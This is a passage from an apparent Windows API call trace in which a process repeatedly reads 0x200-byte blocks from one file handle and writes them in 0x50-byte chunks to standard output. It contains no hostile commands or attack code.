lpBuffer=0x20f3ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f3ec*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.264] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.264] GetFileType (hFile=0x4c) returned 0x1 [0094.264] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.264] WriteFile (in: hFile=0x4c, lpBuffer=0x20f43c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f43c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.264] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.264] GetFileType (hFile=0x4c) returned 0x1 [0094.264] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.264] WriteFile (in: hFile=0x4c, lpBuffer=0x20f48c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f48c*, lpNumberOfBytesWritten=0x20e490*=0x20, lpOverlapped=0x0) returned 1 [0094.265] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.265] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.265] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.265] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.265] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.265] GetFileType (hFile=0x4c) returned 0x1 [0094.265] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.265] GetFileType (hFile=0x4c) returned 0x1 [0094.265] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.265] WriteFile (in: hFile=0x4c, lpBuffer=0x20f2ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.265] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.265] GetFileType (hFile=0x4c) returned 0x1 [0094.265] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.265] WriteFile (in: hFile=0x4c, lpBuffer=0x20f2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f2fc*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.265] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.265] GetFileType (hFile=0x4c) returned 0x1 [0094.265] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.265] WriteFile (in: hFile=0x4c, lpBuffer=0x20f34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f34c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.265] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.265] GetFileType (hFile=0x4c) returned 0x1 [0094.265] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.265] WriteFile (in: hFile=0x4c, lpBuffer=0x20f39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f39c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.265] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.265] GetFileType (hFile=0x4c) returned 0x1 [0094.265] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.265] WriteFile (in: hFile=0x4c, lpBuffer=0x20f3ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f3ec*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.266] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.266] GetFileType (hFile=0x4c) returned 0x1 [0094.266] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.266] WriteFile (in: hFile=0x4c, lpBuffer=0x20f43c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f43c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.266] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.266] GetFileType (hFile=0x4c) returned 0x1 [0094.266] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.266] WriteFile (in: hFile=0x4c, lpBuffer=0x20f48c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f48c*, lpNumberOfBytesWritten=0x20e490*=0x20, lpOverlapped=0x0) returned 1 [0094.266] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.266] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.266] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.266] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.266] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.266] GetFileType (hFile=0x4c) returned 0x1 [0094.266] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.266] GetFileType (hFile=0x4c) returned 0x1 [0094.266] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.266] WriteFile (in: hFile=0x4c, lpBuffer=0x20f2ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.266] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.266] GetFileType (hFile=0x4c) returned 0x1 [0094.266] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.266] WriteFile (in: hFile=0x4c, lpBuffer=0x20f2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f2fc*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.266] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.266] GetFileType (hFile=0x4c) returned 0x1 [0094.266] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.267] WriteFile (in: hFile=0x4c, lpBuffer=0x20f34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f34c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.267] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.267] GetFileType (hFile=0x4c) returned 0x1 [0094.267] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.267] WriteFile (in: hFile=0x4c, lpBuffer=0x20f39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f39c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.267] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.267] GetFileType (hFile=0x4c) returned 0x1 [0094.267] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.267] WriteFile (in: hFile=0x4c, lpBuffer=0x20f3ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f3ec*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.267] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.267] GetFileType (hFile=0x4c) returned 0x1 [0094.267] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.267] WriteFile (in: hFile=0x4c, lpBuffer=0x20f43c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f43c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.267] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.267] GetFileType (hFile=0x4c) returned 0x1 [0094.267] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.267] WriteFile (in: hFile=0x4c, lpBuffer=0x20f48c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f48c*, lpNumberOfBytesWritten=0x20e490*=0x20, lpOverlapped=0x0) returned 1 [0094.267] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.267] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.267] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.267] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.267] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.267] GetFileType (hFile=0x4c) returned 0x1 [0094.267] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.267] GetFileType (hFile=0x4c) returned 0x1 [0094.267] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.267] WriteFile (in: hFile=0x4c, lpBuffer=0x20f2ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.267] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.267] GetFileType (hFile=0x4c) returned 0x1 [0094.267] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.267] WriteFile (in: hFile=0x4c, lpBuffer=0x20f2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f2fc*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.267] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.267] GetFileType (hFile=0x4c) returned 0x1 [0094.267] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.268] WriteFile (in: hFile=0x4c, lpBuffer=0x20f34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f34c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.268] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.268] GetFileType (hFile=0x4c) returned 0x1 [0094.268] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.268] WriteFile (in: hFile=0x4c, lpBuffer=0x20f39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f39c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.268] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.268] GetFileType (hFile=0x4c) returned 0x1 [0094.268] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.268] WriteFile (in: hFile=0x4c, lpBuffer=0x20f3ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f3ec*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.268] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.268] GetFileType (hFile=0x4c) returned 0x1 [0094.268] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.268] WriteFile (in: hFile=0x4c, lpBuffer=0x20f43c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f43c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.268] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.268] GetFileType (hFile=0x4c) returned 0x1 [0094.268] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.268] WriteFile (in: hFile=0x4c, lpBuffer=0x20f48c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f48c*, lpNumberOfBytesWritten=0x20e490*=0x20, lpOverlapped=0x0) returned 1 [0094.268] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.268] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.268] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.268] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.268] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.268] GetFileType (hFile=0x4c) returned 0x1 [0094.268] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.268] GetFileType (hFile=0x4c) returned 0x1 [0094.268] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.268] WriteFile (in: hFile=0x4c, lpBuffer=0x20f2ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.268] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.268] GetFileType (hFile=0x4c) returned 0x1 [0094.268] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.268] WriteFile (in: hFile=0x4c, lpBuffer=0x20f2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f2fc*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.268] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.268] GetFileType (hFile=0x4c) returned 0x1 [0094.268] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.269] WriteFile (in: hFile=0x4c, lpBuffer=0x20f34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f34c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.269] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.269] GetFileType (hFile=0x4c) returned 0x1 [0094.269] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.269] WriteFile (in: hFile=0x4c, lpBuffer=0x20f39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f39c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.269] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.269] GetFileType (hFile=0x4c) returned 0x1 [0094.269] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.269] WriteFile (in: hFile=0x4c, lpBuffer=0x20f3ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f3ec*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.269] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.269] GetFileType (hFile=0x4c) returned 0x1 [0094.269] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.269] WriteFile (in: hFile=0x4c, lpBuffer=0x20f43c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f43c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.269] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.269] GetFileType (hFile=0x4c) returned 0x1 [0094.269] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.269] WriteFile (in: hFile=0x4c, lpBuffer=0x20f48c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f48c*, lpNumberOfBytesWritten=0x20e490*=0x20, lpOverlapped=0x0) returned 1 [0094.269] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.269] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.269] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.269] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.269] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.269] GetFileType (hFile=0x4c) returned 0x1 [0094.269] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.269] GetFileType (hFile=0x4c) returned 0x1 [0094.269] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.269] WriteFile (in: hFile=0x4c, lpBuffer=0x20f2ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.269] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.269] GetFileType (hFile=0x4c) returned 0x1 [0094.269] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.269] WriteFile (in: hFile=0x4c, lpBuffer=0x20f2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f2fc*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.269] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.269] GetFileType (hFile=0x4c) returned 0x1 [0094.269] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.269] WriteFile (in: hFile=0x4c, lpBuffer=0x20f34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f34c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.270] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.270] GetFileType (hFile=0x4c) returned 0x1 [0094.270] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.270] WriteFile (in: hFile=0x4c, lpBuffer=0x20f39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f39c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.270] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.270] GetFileType (hFile=0x4c) returned 0x1 [0094.270] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.270] WriteFile (in: hFile=0x4c, lpBuffer=0x20f3ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f3ec*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.270] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.270] GetFileType (hFile=0x4c) returned 0x1 [0094.270] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.270] WriteFile (in: hFile=0x4c, lpBuffer=0x20f43c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f43c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.270] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.270] GetFileType (hFile=0x4c) returned 0x1 [0094.270] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.270] WriteFile (in: hFile=0x4c, lpBuffer=0x20f48c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f48c*, lpNumberOfBytesWritten=0x20e490*=0x20, lpOverlapped=0x0) returned 1 [0094.270] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.270] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.270] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.270] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.270] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.270] GetFileType (hFile=0x4c) returned 0x1 [0094.270] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.270] GetFileType (hFile=0x4c) returned 0x1 [0094.270] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.270] WriteFile (in: hFile=0x4c, lpBuffer=0x20f2ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.270] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.270] GetFileType (hFile=0x4c) returned 0x1 [0094.270] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.270] WriteFile (in: hFile=0x4c, lpBuffer=0x20f2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f2fc*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.270] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.270] GetFileType (hFile=0x4c) returned 0x1 [0094.270] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.270] WriteFile (in: hFile=0x4c, lpBuffer=0x20f34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f34c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.271] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.271] GetFileType (hFile=0x4c) returned 0x1 [0094.271] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.271] WriteFile (in: hFile=0x4c, lpBuffer=0x20f39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f39c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.271] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.271] GetFileType (hFile=0x4c) returned 0x1 [0094.271] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.271] WriteFile (in: hFile=0x4c, lpBuffer=0x20f3ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f3ec*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.271] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.271] GetFileType (hFile=0x4c) returned 0x1 [0094.271] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.271] WriteFile (in: hFile=0x4c, lpBuffer=0x20f43c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f43c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.271] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.271] GetFileType (hFile=0x4c) returned 0x1 [0094.271] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.271] WriteFile (in: hFile=0x4c, lpBuffer=0x20f48c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f48c*, lpNumberOfBytesWritten=0x20e490*=0x20, lpOverlapped=0x0) returned 1 [0094.271] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.271] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.271] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.271] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.271] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.271] GetFileType (hFile=0x4c) returned 0x1 [0094.271] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.271] GetFileType (hFile=0x4c) returned 0x1 [0094.271] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.271] WriteFile (in: hFile=0x4c, lpBuffer=0x20f2ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.271] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.271] GetFileType (hFile=0x4c) returned 0x1 [0094.271] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.271] WriteFile (in: hFile=0x4c, lpBuffer=0x20f2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f2fc*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.271] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.271] GetFileType (hFile=0x4c) returned 0x1 [0094.271] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.271] WriteFile (in: hFile=0x4c, lpBuffer=0x20f34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f34c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.272] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.272] GetFileType (hFile=0x4c) returned 0x1 [0094.272] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.272] WriteFile (in: hFile=0x4c, lpBuffer=0x20f39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f39c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.272] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.272] GetFileType (hFile=0x4c) returned 0x1 [0094.272] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.272] WriteFile (in: hFile=0x4c, lpBuffer=0x20f3ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f3ec*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.272] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.272] GetFileType (hFile=0x4c) returned 0x1 [0094.272] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.272] WriteFile (in: hFile=0x4c, lpBuffer=0x20f43c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f43c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.272] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.272] GetFileType (hFile=0x4c) returned 0x1 [0094.272] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.272] WriteFile (in: hFile=0x4c, lpBuffer=0x20f48c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f48c*, lpNumberOfBytesWritten=0x20e490*=0x20, lpOverlapped=0x0) returned 1 [0094.272] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.272] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.272] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.272] ReadFile (in: hFile=0x54, 